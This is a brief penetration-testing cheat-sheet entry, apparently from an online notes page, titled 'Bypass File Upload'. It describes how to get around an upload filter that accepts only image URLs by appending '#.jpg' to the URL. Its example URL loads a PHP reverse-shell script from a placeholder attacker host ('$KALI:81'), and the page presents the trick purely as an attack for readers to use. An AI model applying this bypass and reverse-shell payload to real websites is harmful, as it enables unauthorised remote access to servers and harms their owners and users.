Bypass File Upload
If the site accepts a URL but only accepts images, try adding # followed by the accept format, this way you are still uploading your file without modifying it as it cuts off everything after #
Browser
http://$KALI:81/php-reverse-shell.php#.jpg
Last updated